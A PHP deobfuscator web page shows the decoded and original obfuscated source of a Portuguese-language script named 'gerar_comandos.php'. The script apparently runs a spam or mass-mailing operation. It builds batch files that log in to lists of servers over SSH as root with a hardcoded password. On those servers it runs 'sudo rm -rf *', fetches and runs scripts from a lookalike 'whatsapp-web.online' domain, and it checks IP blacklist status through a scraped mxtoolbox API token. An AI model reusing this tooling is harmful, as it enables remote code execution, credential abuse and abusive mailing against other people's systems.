Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto SubVK; nnsc7: if ($argv[1] == "\164\x65\x73\164\x65") { $lista_ips = file_get..

Decoded Output download

<?php 
 goto SubVK; nnsc7: if ($argv[1] == "teste") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\xa", $lista_ips); file_put_contents("_ENVIAR_TESTE.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $nomeLista = "listateste.txt"; $cmd = "start plink.exe -no-antispoof -ssh -l " . trim($UserMaquinas) . " -pw "" . trim($SenhaMaquinas) . "" " . trim($value[0]) . " "sudo rm -rf listateste.txt; sudo wget " . trim($LINK_LISTAS_TESTE) . trim($nomeLista) . " --no-check-certificate; sudo perl 2.txt " . trim($nomeLista) . " " . trim($value[1]) . """; file_put_contents("_ENVIAR_TESTE.bat", $cmd . "\xa", FILE_APPEND); $count_listas++; } print "[+]ARQUIVO DE COMANDO ENVIAR CRIADO: _ENVIAR_TESTE.bat\xa"; } goto DmBZC; AHnx2: if ($argv[1] == "postfix") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("
", $lista_ips); file_put_contents("_POSTFIX.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $subs = explode(".", $value[1]); $cmd = "start plink.exe -no-antispoof -ssh -l " . trim($UserMaquinas) . " -pw "" . trim($SenhaMaquinas) . "" " . trim($value[0]) . " "sudo rm -rf * ; sudo wget " . trim($LINK_SH) . " --no-check-certificate; sudo chmod 777 *; sudo ./s.sh " . trim($value[1]) . " " . trim($subs[0]) . " " . trim($subs[1]) . "." . trim($subs[2]) . " " . trim($value[2]) . """; file_put_contents("_POSTFIX.bat", $cmd . "
", FILE_APPEND); } print "[+]ARQUIVO DE COMANDO POSTFIX CRIADO: _POSTFIX.bat
"; } goto Ah2F2; Ah2F2: if ($argv[1] == "enviar") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("
", $lista_ips); file_put_contents("_ENVIAR.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $nomeLista = "add_" . str_pad($count_listas, 1, "0", STR_PAD_LEFT) . ".txt"; $cmd = "start plink.exe -no-antispoof -ssh -l " . trim($UserMaquinas) . " -pw "" . trim($SenhaMaquinas) . "" " . trim($value[0]) . " "sudo rm -rf add*; sudo wget " . trim($LINK_LISTAS) . trim($nomeLista) . " --no-check-certificate; sudo perl 2.txt " . trim($nomeLista) . " " . trim($value[1]) . """; file_put_contents("_ENVIAR.bat", $cmd . "\xa", FILE_APPEND); $count_listas++; } print "[+]ARQUIVO DE COMANDO ENVIAR CRIADO: _ENVIAR.bat\xa"; } goto nnsc7; Njesa: $LINK_LISTAS = "http://www.whatsapp-web.online/lista/"; goto HLAlZ; hKFBf: if (!isset($argv[2])) { print "[-] COLOQUE O COMANDO QUE DESEJA EXECUTAR:
"; print "[-] gerar_comandos.php blacklist lista_ips.txt\xa"; print "[-] gerar_comandos.php session lista_ips.txt\xa"; print "[-] gerar_comandos.php postfix lista_ips.txt
"; print "[-] gerar_comandos.php enviar lista_ips.txt\xa"; die; } goto LtNjS; bNp3i: $count_listas = 0; goto RqBWM; SubVK: $LINK_SH = "http://www.whatsapp-web.online/sh/s.sh"; goto Njesa; HLAlZ: $LINK_LISTAS_TESTE = "http://www.whatsapp-web.online/lista/"; goto C08bs; MwMJX: print "[**]GERADOR DE COMANDOS - TOMA PIROKADA\xa"; goto F5vZr; IaAkY: print "------------------------------------------------\xa
"; goto hKFBf; pWE2p: if ($argv[1] == "session") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\xa", $lista_ips); file_put_contents("_SESSION.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $cmd = "echo y | plink.exe -ssh " . trim($UserMaquinas) . "@" . trim($value[0]) . " -no-antispoof -pw "" . trim($SenhaMaquinas) . "" "id""; file_put_contents("_SESSION.bat", $cmd . "
", FILE_APPEND); } print "[+]ARQUIVO DE COMANDO SESSION CRIADO: _SESSION.bat
"; } goto AHnx2; F5vZr: print "[**]RUBBER
"; goto IaAkY; LtNjS: if ($argv[1] == "blacklist") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("
", $lista_ips); $ArrayServers = array(); file_put_contents("IPS_LIMPOS.txt", ''); foreach ($lista_ips as $key => $LinhaIPS) { $IP = explode(" ", $LinhaIPS); $stringServers = ''; $GET_BLACKLIST = blackList(trim($IP[0])); if (isJSON($GET_BLACKLIST)) { $GET_BLACKLIST_JSON = json_decode($GET_BLACKLIST); foreach ($GET_BLACKLIST_JSON->ResultDS->SubActions as $key => $servers) { $ArrayServers[$servers->SubActionID] = $servers->Name; } if (count($GET_BLACKLIST_JSON->ListedBlacklists) > 0) { $ListarServers = ''; foreach ($GET_BLACKLIST_JSON->ListedBlacklists as $key => $value) { $ListarServers .= $ArrayServers[trim($value)] . "|"; } print "[*][" . trim($IP[0]) . "]IP SUJO: {$ListarServers} \xa"; } else { print "[+][" . trim($IP[0]) . "]IP LIMPO!\xa"; file_put_contents("IPS_LIMPOS.txt", $LinhaIPS . "\xa", FILE_APPEND); } } else { print "[-][" . trim($IP[0]) . "]ERRO GET TOOLZ>>>>> " . $GET_BLACKLIST . "
"; } $ArrayServers = array(); } } goto pWE2p; RqBWM: print "

-----------------------------------------------\xa"; goto MwMJX; MCjMX: if ($argv[1] == "eng") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("
", $lista_ips); file_put_contents("_TROCAR_ENG.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $nomeeng = "eng.txt"; $cmd = "start plink.exe -no-antispoof -ssh -l " . trim($UserMaquinas) . " -pw "" . trim($SenhaMaquinas) . "" " . trim($value[0]) . " "sudo rm -rf eng.txt; sudo wget " . trim($LINK_ENG) . trim($nomeeng) . ";"; file_put_contents("_TROCAR_ENG.bat", $cmd . "
", FILE_APPEND); $count_listas++; } print "[+]ARQUIVO DE COMANDO ENG CRIADO: _TROCAR_ENG.bat
"; } goto Cwm8K; DmBZC: if ($argv[1] == "limpar") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("
", $lista_ips); file_put_contents("_LIMPAR_SH.bat", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "root"; $SenhaMaquinas = "Aa261214XZ"; $value = explode(" ", $value); $nomeLista = "listateste.txt"; $cmd = "start plink.exe -no-antispoof -ssh -l " . trim($UserMaquinas) . " -pw "" . trim($SenhaMaquinas) . "" " . trim($value[0]) . " "sudo rm -rf s.sh";"; file_put_contents("_LIMPAR_SH.bat", $cmd . "
", FILE_APPEND); $count_listas++; } print "[+]ARQUIVO DE COMANDO ENVIAR CRIADO: _LIMPAR_SH.bat\xa"; } goto MCjMX; Cwm8K: function blackList($IP) { $ch = curl_init(); $header = array("user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", "accept: application/json, text/javascript, */*; q=0.01", "accept-language: en-US,en;q=0.5", "content-type: application/json; charset=utf-8", "tempauthorization: e5d93835-5077-4c19-8746-7b97f48b3add", "x-requested-with: XMLHttpRequest", "referer: https://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a" . $IP . "&run=toolpage", "pragma: no-cache", "cache-control: no-cache", "te: trailers"); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_URL, "https://mxtoolbox.com/api/v1/Lookup?command=blacklist&argument=" . $IP . "&resultIndex=6&disableRhsbl=true&format=1"); curl_setopt($ch, CURLOPT_TIMEOUT, 40); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_VERBOSE, 0); curl_setopt($ch, CURLOPT_HEADER, 0); @ob_flush(); @ob_end_flush(); return curl_exec($ch); curl_close($ch); unset($ch); } goto cLdpn; C08bs: $LINK_ENG = "http://www.whatsapp-web.online/envio/"; goto bNp3i; cLdpn: function isJSON($string) { return is_string($string) && is_array(json_decode($string, true)) ? true : false; } ?>

Did this file decode correctly?

Original Code

<?php
 goto SubVK; nnsc7: if ($argv[1] == "\164\x65\x73\164\x65") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\xa", $lista_ips); file_put_contents("\x5f\x45\x4e\x56\111\101\x52\137\x54\x45\x53\124\105\x2e\142\x61\x74", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\162\x6f\x6f\164"; $SenhaMaquinas = "\101\x61\x32\x36\x31\x32\61\64\130\132"; $value = explode("\40", $value); $nomeLista = "\154\151\x73\164\141\164\x65\x73\164\145\56\x74\170\164"; $cmd = "\x73\164\141\162\x74\40\x70\154\151\156\153\x2e\x65\170\145\40\55\x6e\157\x2d\x61\156\x74\151\x73\160\157\157\x66\40\x2d\x73\163\150\x20\55\154\40" . trim($UserMaquinas) . "\40\55\160\167\x20\42" . trim($SenhaMaquinas) . "\x22\40" . trim($value[0]) . "\x20\42\163\165\x64\157\x20\162\x6d\x20\55\162\146\x20\154\x69\163\x74\141\164\x65\163\x74\x65\56\x74\170\x74\x3b\40\163\165\144\x6f\x20\x77\147\145\x74\40" . trim($LINK_LISTAS_TESTE) . trim($nomeLista) . "\40\x2d\55\156\x6f\x2d\x63\150\x65\x63\x6b\55\x63\145\162\x74\x69\x66\x69\143\141\164\145\x3b\x20\163\x75\x64\157\x20\160\145\x72\x6c\x20\62\x2e\164\x78\x74\x20" . trim($nomeLista) . "\40" . trim($value[1]) . "\x22"; file_put_contents("\x5f\x45\116\x56\111\101\x52\137\x54\105\x53\x54\105\x2e\142\141\x74", $cmd . "\xa", FILE_APPEND); $count_listas++; } print "\133\x2b\x5d\101\122\x51\x55\x49\126\117\x20\104\x45\40\x43\x4f\115\101\x4e\x44\117\40\x45\116\126\111\101\122\x20\x43\122\111\x41\104\x4f\72\x20\137\105\x4e\x56\111\101\x52\137\124\x45\x53\124\105\x2e\x62\x61\164\xa"; } goto DmBZC; AHnx2: if ($argv[1] == "\x70\x6f\x73\x74\146\151\170") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\12", $lista_ips); file_put_contents("\137\120\x4f\x53\124\x46\111\x58\x2e\142\141\x74", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\x72\157\157\164"; $SenhaMaquinas = "\x41\x61\62\x36\61\62\x31\64\130\132"; $value = explode("\x20", $value); $subs = explode("\56", $value[1]); $cmd = "\163\164\141\x72\164\x20\x70\154\x69\156\153\x2e\145\x78\145\x20\x2d\x6e\157\x2d\141\156\164\x69\163\160\157\x6f\146\x20\x2d\x73\163\x68\40\55\x6c\40" . trim($UserMaquinas) . "\40\55\160\x77\40\x22" . trim($SenhaMaquinas) . "\42\40" . trim($value[0]) . "\40\42\x73\x75\x64\x6f\x20\x72\155\40\x2d\x72\146\40\52\40\73\40\163\x75\144\157\x20\167\147\x65\164\x20" . trim($LINK_SH) . "\x20\55\55\156\x6f\55\x63\150\145\x63\153\55\x63\x65\162\x74\x69\146\151\x63\x61\x74\145\73\40\163\165\x64\x6f\x20\143\150\x6d\x6f\x64\40\67\x37\67\x20\52\x3b\40\163\x75\x64\x6f\40\x2e\57\x73\56\163\150\x20" . trim($value[1]) . "\x20" . trim($subs[0]) . "\40" . trim($subs[1]) . "\56" . trim($subs[2]) . "\40" . trim($value[2]) . "\x22"; file_put_contents("\137\120\117\x53\124\x46\111\x58\x2e\142\x61\x74", $cmd . "\12", FILE_APPEND); } print "\133\x2b\135\x41\x52\121\x55\x49\126\117\x20\x44\105\x20\x43\117\x4d\x41\x4e\x44\x4f\x20\120\x4f\x53\124\106\x49\130\40\103\122\111\x41\x44\117\72\x20\x5f\x50\x4f\x53\x54\106\x49\130\x2e\142\141\x74\12"; } goto Ah2F2; Ah2F2: if ($argv[1] == "\x65\x6e\166\151\141\162") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\12", $lista_ips); file_put_contents("\x5f\105\x4e\126\x49\x41\x52\x2e\142\x61\x74", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\162\x6f\157\164"; $SenhaMaquinas = "\101\x61\62\66\x31\62\x31\64\x58\x5a"; $value = explode("\40", $value); $nomeLista = "\141\x64\144\137" . str_pad($count_listas, 1, "\60", STR_PAD_LEFT) . "\56\x74\170\x74"; $cmd = "\163\164\x61\162\x74\40\x70\154\151\x6e\x6b\x2e\145\x78\x65\40\x2d\x6e\x6f\55\x61\x6e\x74\x69\x73\160\157\x6f\146\40\55\x73\x73\150\x20\55\x6c\40" . trim($UserMaquinas) . "\40\55\x70\x77\x20\x22" . trim($SenhaMaquinas) . "\x22\x20" . trim($value[0]) . "\x20\x22\x73\x75\x64\157\40\x72\155\x20\x2d\162\146\x20\141\x64\144\52\73\40\x73\165\x64\157\40\167\147\145\x74\x20" . trim($LINK_LISTAS) . trim($nomeLista) . "\40\x2d\x2d\156\157\x2d\143\x68\145\143\x6b\55\x63\x65\x72\x74\x69\x66\x69\x63\x61\164\145\73\x20\x73\165\144\157\x20\x70\145\x72\154\40\x32\x2e\164\170\x74\x20" . trim($nomeLista) . "\x20" . trim($value[1]) . "\42"; file_put_contents("\x5f\105\116\126\x49\101\x52\56\x62\x61\x74", $cmd . "\xa", FILE_APPEND); $count_listas++; } print "\133\53\x5d\101\122\121\x55\x49\126\x4f\x20\x44\105\x20\x43\x4f\x4d\x41\x4e\104\117\x20\105\116\126\x49\101\122\x20\103\122\x49\101\x44\117\x3a\40\x5f\x45\116\126\x49\x41\x52\x2e\x62\141\164\xa"; } goto nnsc7; Njesa: $LINK_LISTAS = "\x68\x74\164\160\x3a\x2f\x2f\x77\167\x77\x2e\167\x68\x61\164\x73\141\x70\160\55\x77\145\x62\x2e\x6f\x6e\x6c\x69\156\x65\x2f\154\151\x73\164\x61\x2f"; goto HLAlZ; hKFBf: if (!isset($argv[2])) { print "\133\x2d\x5d\40\x43\117\114\x4f\121\125\105\x20\117\40\x43\117\x4d\x41\x4e\x44\x4f\40\121\125\x45\40\104\x45\x53\105\112\101\40\105\x58\105\103\125\x54\101\122\72\12"; print "\133\55\135\x20\147\145\x72\141\x72\x5f\143\x6f\155\x61\156\144\x6f\163\x2e\160\150\160\x20\x62\154\x61\143\153\x6c\x69\x73\164\40\x6c\x69\x73\164\141\x5f\x69\x70\163\x2e\164\x78\164\xa"; print "\133\55\x5d\x20\147\145\162\x61\x72\x5f\143\157\155\x61\156\x64\157\163\56\160\150\x70\40\163\145\163\x73\x69\x6f\x6e\40\154\151\x73\164\x61\x5f\x69\x70\x73\x2e\164\170\164\xa"; print "\x5b\x2d\135\40\147\x65\x72\141\x72\137\143\x6f\x6d\141\x6e\x64\157\x73\56\160\150\x70\40\160\157\163\x74\146\151\170\40\154\x69\x73\164\x61\x5f\x69\x70\x73\x2e\x74\x78\164\12"; print "\133\55\x5d\40\147\145\x72\141\162\x5f\143\157\x6d\x61\156\x64\157\163\56\160\150\x70\40\145\156\x76\x69\141\x72\x20\x6c\151\163\164\141\x5f\151\160\163\56\164\x78\x74\xa"; die; } goto LtNjS; bNp3i: $count_listas = 0; goto RqBWM; SubVK: $LINK_SH = "\x68\164\164\160\72\x2f\57\167\x77\x77\56\167\150\141\x74\x73\141\x70\160\x2d\x77\145\142\56\157\156\x6c\x69\x6e\145\57\x73\x68\x2f\x73\x2e\163\x68"; goto Njesa; HLAlZ: $LINK_LISTAS_TESTE = "\x68\x74\x74\x70\72\57\x2f\167\167\x77\56\167\150\x61\x74\163\x61\160\160\55\167\x65\x62\x2e\x6f\x6e\154\x69\x6e\x65\x2f\x6c\x69\x73\164\141\x2f"; goto C08bs; MwMJX: print "\x5b\52\x2a\135\x47\x45\x52\x41\x44\117\x52\40\104\x45\40\x43\117\x4d\101\x4e\x44\117\123\x20\x2d\40\124\x4f\x4d\101\40\x50\x49\122\117\x4b\x41\x44\x41\xa"; goto F5vZr; IaAkY: print "\55\55\55\55\55\55\55\x2d\x2d\x2d\55\55\55\55\x2d\55\55\55\55\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d\x2d\55\55\55\x2d\x2d\55\55\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\xa\12"; goto hKFBf; pWE2p: if ($argv[1] == "\163\x65\x73\x73\x69\x6f\x6e") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\xa", $lista_ips); file_put_contents("\x5f\x53\x45\x53\123\x49\x4f\x4e\56\x62\x61\164", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\x72\157\x6f\164"; $SenhaMaquinas = "\101\x61\x32\x36\x31\62\61\64\x58\132"; $value = explode("\40", $value); $cmd = "\145\143\x68\157\x20\171\x20\x7c\40\160\x6c\151\156\153\56\x65\x78\145\x20\x2d\163\x73\x68\x20" . trim($UserMaquinas) . "\x40" . trim($value[0]) . "\x20\55\156\157\55\x61\156\164\x69\163\x70\x6f\157\146\x20\x2d\160\x77\40\x22" . trim($SenhaMaquinas) . "\x22\x20\x22\151\144\x22"; file_put_contents("\137\x53\x45\x53\x53\111\117\x4e\x2e\x62\141\x74", $cmd . "\12", FILE_APPEND); } print "\x5b\x2b\x5d\x41\122\x51\x55\111\x56\x4f\40\x44\105\x20\x43\117\115\x41\x4e\104\x4f\x20\x53\105\123\123\x49\x4f\x4e\40\103\122\x49\101\104\117\72\x20\x5f\123\105\123\123\x49\117\116\56\x62\141\x74\12"; } goto AHnx2; F5vZr: print "\133\x2a\52\135\122\x55\102\102\x45\122\12"; goto IaAkY; LtNjS: if ($argv[1] == "\x62\154\141\143\153\154\x69\163\x74") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\12", $lista_ips); $ArrayServers = array(); file_put_contents("\x49\120\123\x5f\114\x49\x4d\x50\x4f\123\x2e\x74\170\x74", ''); foreach ($lista_ips as $key => $LinhaIPS) { $IP = explode("\40", $LinhaIPS); $stringServers = ''; $GET_BLACKLIST = blackList(trim($IP[0])); if (isJSON($GET_BLACKLIST)) { $GET_BLACKLIST_JSON = json_decode($GET_BLACKLIST); foreach ($GET_BLACKLIST_JSON->ResultDS->SubActions as $key => $servers) { $ArrayServers[$servers->SubActionID] = $servers->Name; } if (count($GET_BLACKLIST_JSON->ListedBlacklists) > 0) { $ListarServers = ''; foreach ($GET_BLACKLIST_JSON->ListedBlacklists as $key => $value) { $ListarServers .= $ArrayServers[trim($value)] . "\174"; } print "\x5b\x2a\x5d\x5b" . trim($IP[0]) . "\x5d\111\x50\x20\123\x55\112\117\x3a\40{$ListarServers}\x20\xa"; } else { print "\133\53\x5d\x5b" . trim($IP[0]) . "\135\111\x50\x20\114\111\x4d\120\117\x21\xa"; file_put_contents("\111\x50\x53\x5f\x4c\111\115\x50\117\x53\56\164\x78\164", $LinhaIPS . "\xa", FILE_APPEND); } } else { print "\x5b\x2d\x5d\133" . trim($IP[0]) . "\135\x45\x52\x52\x4f\40\x47\x45\124\x20\x54\117\117\x4c\x5a\x3e\x3e\x3e\76\76\x20" . $GET_BLACKLIST . "\12"; } $ArrayServers = array(); } } goto pWE2p; RqBWM: print "\12\12\55\55\55\55\55\x2d\55\55\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\55\55\55\55\x2d\55\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\x2d\xa"; goto MwMJX; MCjMX: if ($argv[1] == "\145\156\147") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\12", $lista_ips); file_put_contents("\x5f\x54\x52\117\103\101\x52\137\105\116\x47\56\142\141\164", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\x72\157\x6f\164"; $SenhaMaquinas = "\x41\x61\x32\66\x31\x32\x31\x34\x58\x5a"; $value = explode("\x20", $value); $nomeeng = "\145\156\x67\56\x74\x78\164"; $cmd = "\x73\x74\141\162\x74\40\x70\x6c\x69\156\153\x2e\x65\170\x65\x20\55\x6e\157\x2d\x61\156\164\x69\x73\x70\157\157\146\40\55\163\163\150\40\x2d\x6c\x20" . trim($UserMaquinas) . "\x20\x2d\x70\167\40\x22" . trim($SenhaMaquinas) . "\x22\40" . trim($value[0]) . "\40\42\163\165\144\x6f\x20\162\x6d\x20\55\162\x66\40\x65\x6e\147\56\164\x78\164\x3b\x20\x73\165\x64\x6f\x20\x77\147\x65\x74\x20" . trim($LINK_ENG) . trim($nomeeng) . "\x3b"; file_put_contents("\137\x54\122\117\103\x41\x52\x5f\x45\116\x47\x2e\x62\141\164", $cmd . "\12", FILE_APPEND); $count_listas++; } print "\133\x2b\x5d\x41\122\x51\125\x49\x56\x4f\x20\104\x45\x20\103\x4f\x4d\x41\x4e\x44\x4f\x20\105\x4e\x47\x20\x43\122\x49\101\104\x4f\72\40\x5f\x54\x52\117\x43\101\x52\x5f\x45\x4e\107\x2e\142\141\164\12"; } goto Cwm8K; DmBZC: if ($argv[1] == "\x6c\151\x6d\160\141\162") { $lista_ips = file_get_contents($argv[2]); $lista_ips = explode("\12", $lista_ips); file_put_contents("\x5f\x4c\111\115\120\101\x52\137\x53\110\x2e\x62\141\164", ''); foreach ($lista_ips as $key => $value) { $UserMaquinas = "\x72\x6f\x6f\164"; $SenhaMaquinas = "\x41\141\62\x36\61\x32\x31\x34\130\132"; $value = explode("\40", $value); $nomeLista = "\154\151\163\x74\x61\x74\x65\x73\x74\x65\56\164\170\x74"; $cmd = "\x73\x74\x61\x72\x74\x20\x70\154\x69\x6e\x6b\56\x65\x78\145\x20\55\156\x6f\x2d\x61\156\x74\x69\x73\x70\157\x6f\146\x20\x2d\163\x73\150\x20\x2d\x6c\x20" . trim($UserMaquinas) . "\40\55\x70\167\x20\42" . trim($SenhaMaquinas) . "\42\x20" . trim($value[0]) . "\x20\x22\x73\x75\144\157\x20\162\155\40\55\x72\x66\x20\x73\56\163\150\42\73"; file_put_contents("\x5f\x4c\111\115\x50\101\122\x5f\123\x48\56\x62\141\x74", $cmd . "\12", FILE_APPEND); $count_listas++; } print "\x5b\53\x5d\101\122\x51\125\x49\x56\117\40\x44\105\x20\x43\x4f\115\x41\116\104\117\x20\105\x4e\x56\111\101\122\x20\103\x52\x49\x41\104\x4f\x3a\40\137\x4c\x49\115\120\101\122\137\123\x48\56\142\141\164\xa"; } goto MCjMX; Cwm8K: function blackList($IP) { $ch = curl_init(); $header = array("\165\163\x65\x72\x2d\x61\147\145\x6e\x74\x3a\x20\x4d\x6f\172\151\154\x6c\x61\x2f\65\x2e\x30\x20\x28\x57\x69\156\144\x6f\167\x73\40\116\124\x20\x31\60\x2e\60\x3b\x20\x57\151\156\x36\64\73\40\170\x36\64\x3b\40\x72\166\x3a\70\71\x2e\60\x29\40\107\x65\143\153\157\57\x32\60\x31\x30\60\x31\x30\61\x20\x46\151\x72\x65\146\x6f\x78\57\x38\x39\x2e\x30", "\141\143\x63\145\160\164\x3a\40\x61\x70\x70\x6c\x69\143\x61\164\x69\157\156\x2f\152\x73\x6f\x6e\54\x20\x74\x65\x78\x74\57\152\141\166\x61\163\x63\162\x69\160\164\54\40\x2a\x2f\x2a\73\40\x71\75\x30\x2e\60\61", "\141\143\143\145\160\164\55\x6c\141\x6e\147\x75\x61\147\x65\x3a\x20\x65\156\x2d\125\x53\x2c\x65\x6e\x3b\x71\x3d\x30\56\65", "\x63\157\x6e\164\x65\x6e\x74\55\164\x79\160\x65\x3a\x20\x61\160\x70\x6c\151\143\x61\x74\151\157\x6e\x2f\152\163\157\x6e\73\x20\x63\x68\141\162\163\145\x74\x3d\x75\x74\x66\x2d\x38", "\164\145\155\x70\x61\165\164\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x3a\x20\x65\x35\144\71\x33\x38\x33\65\x2d\x35\60\67\x37\x2d\x34\143\61\71\x2d\x38\67\64\x36\55\67\142\x39\67\x66\64\70\x62\63\x61\x64\144", "\x78\55\162\x65\x71\x75\145\x73\164\145\x64\55\167\x69\164\150\72\40\x58\x4d\x4c\110\x74\x74\160\x52\x65\x71\x75\x65\x73\x74", "\x72\x65\x66\x65\162\145\x72\72\x20\150\164\x74\x70\x73\x3a\57\x2f\x6d\170\x74\x6f\157\154\x62\x6f\x78\56\x63\x6f\x6d\x2f\123\x75\x70\x65\x72\124\157\x6f\x6c\56\x61\163\x70\x78\77\x61\143\164\151\x6f\156\x3d\x62\x6c\x61\x63\x6b\x6c\x69\163\x74\x25\63\141" . $IP . "\46\x72\165\x6e\75\x74\x6f\157\x6c\x70\x61\x67\x65", "\x70\162\141\x67\155\x61\72\x20\156\x6f\55\x63\x61\x63\x68\145", "\x63\x61\143\150\145\x2d\143\157\x6e\x74\162\157\154\72\x20\156\x6f\x2d\x63\141\x63\150\145", "\164\x65\x3a\40\164\x72\141\151\x6c\x65\x72\163"); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_URL, "\x68\164\164\x70\163\72\57\57\x6d\x78\x74\157\x6f\154\142\x6f\170\x2e\x63\x6f\155\57\141\160\151\x2f\x76\61\57\x4c\157\x6f\x6b\x75\160\77\143\157\155\x6d\x61\156\144\75\x62\x6c\x61\143\x6b\x6c\151\x73\x74\x26\x61\x72\147\165\155\x65\x6e\x74\x3d" . $IP . "\46\x72\x65\x73\165\154\x74\111\156\x64\145\170\75\66\x26\144\151\x73\x61\142\154\x65\x52\x68\163\142\x6c\75\164\x72\165\145\46\x66\157\162\x6d\x61\x74\x3d\x31"); curl_setopt($ch, CURLOPT_TIMEOUT, 40); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_VERBOSE, 0); curl_setopt($ch, CURLOPT_HEADER, 0); @ob_flush(); @ob_end_flush(); return curl_exec($ch); curl_close($ch); unset($ch); } goto cLdpn; C08bs: $LINK_ENG = "\x68\x74\x74\x70\x3a\57\57\x77\167\167\56\x77\x68\x61\x74\x73\141\x70\x70\55\167\145\x62\x2e\157\x6e\154\x69\x6e\145\57\145\x6e\166\x69\157\x2f"; goto bNp3i; cLdpn: function isJSON($string) { return is_string($string) && is_array(json_decode($string, true)) ? true : false; }

Function Calls

None

Variables

None

Stats

MD5 efce709f0e867721e1fe78b59d058f2e
Eval Count 0
Decode Time 66 ms